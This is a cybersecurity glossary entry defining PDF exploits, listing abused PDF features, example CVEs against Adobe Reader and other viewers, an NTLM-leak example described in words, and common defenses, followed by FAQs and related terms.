PDF Exploit
What is PDF Exploit?
PDF ExploitA malicious PDF document that abuses parser bugs, embedded JavaScript, fonts, or external actions in a PDF reader to achieve code execution or data exfiltration.
A PDF exploit is an attack delivered through a crafted PDF document that abuses one of the format's many features — embedded JavaScript, OpenAction triggers, GoToE/GoToR remote URLs, EMF/JBIG2/JPX image parsers, embedded XFA forms, U3D 3D streams, or font handlers — to attack a PDF viewer. Historically Adobe Acrobat Reader has been a frequent target (e.g. CVE-2009-1492, CVE-2018-4990, CVE-2023-21608), but Foxit, Chrome's PDFium, and macOS Preview have all had critical bugs. Modern PDF exploits often achieve remote code execution via memory corruption, leak NTLM hashes through automatic URL fetches, or trigger drive-by malware downloads. Defenses include patching, disabling JavaScript, using sandboxed viewers, and email gateway analysis.
● Examples
- 01
A PDF with embedded JavaScript that triggers a heap overflow in Adobe Reader (CVE-2018-4990).
- 02
An NTLM credential-leak PDF with a UNC-path GoToR action.
● Frequently asked questions
What is PDF Exploit?
A malicious PDF document that abuses parser bugs, embedded JavaScript, fonts, or external actions in a PDF reader to achieve code execution or data exfiltration. It belongs to the Application Security category of cybersecurity.
What does PDF Exploit mean?
A malicious PDF document that abuses parser bugs, embedded JavaScript, fonts, or external actions in a PDF reader to achieve code execution or data exfiltration.
How does PDF Exploit work?
A PDF exploit is an attack delivered through a crafted PDF document that abuses one of the format's many features — embedded JavaScript, OpenAction triggers, GoToE/GoToR remote URLs, EMF/JBIG2/JPX image parsers, embedded XFA forms, U3D 3D streams, or font handlers — to attack a PDF viewer. Historically Adobe Acrobat Reader has been a frequent target (e.g. CVE-2009-1492, CVE-2018-4990, CVE-2023-21608), but Foxit, Chrome's PDFium, and macOS Preview have all had critical bugs. Modern PDF exploits often achieve remote code execution via memory corruption, leak NTLM hashes through automatic URL fetches, or trigger drive-by malware downloads. Defenses include patching, disabling JavaScript, using sandboxed viewers, and email gateway analysis.
How do you defend against PDF Exploit?
Defences for PDF Exploit typically combine technical controls and operational practices, as detailed in the full definition above.
What are other names for PDF Exploit?
Common alternative names include: Malicious PDF, PDF-based attack.
● Related terms
- attacks№ 360
Drive-by Download
An attack in which malware is silently installed on a victim's device simply by visiting a compromised or malicious website.
- attacks№ 195
Code Injection
A class of vulnerabilities where attacker-supplied data is interpreted and executed as code by an application, leading to arbitrary execution in its context.
- attacks№ 821
Phishing
A social-engineering attack in which an attacker impersonates a trusted party to trick a victim into revealing credentials, transferring money, or running malware.
- appsec№ 129
Browser Sandbox
An OS-level isolation layer that confines a browser's renderer and helper processes so that compromised web code cannot read the file system or other applications.
- vulnerabilities№ 667
Memory Corruption
An umbrella term for vulnerabilities where a program writes outside the bounds of intended memory, undermining type-safety, control flow, or data integrity.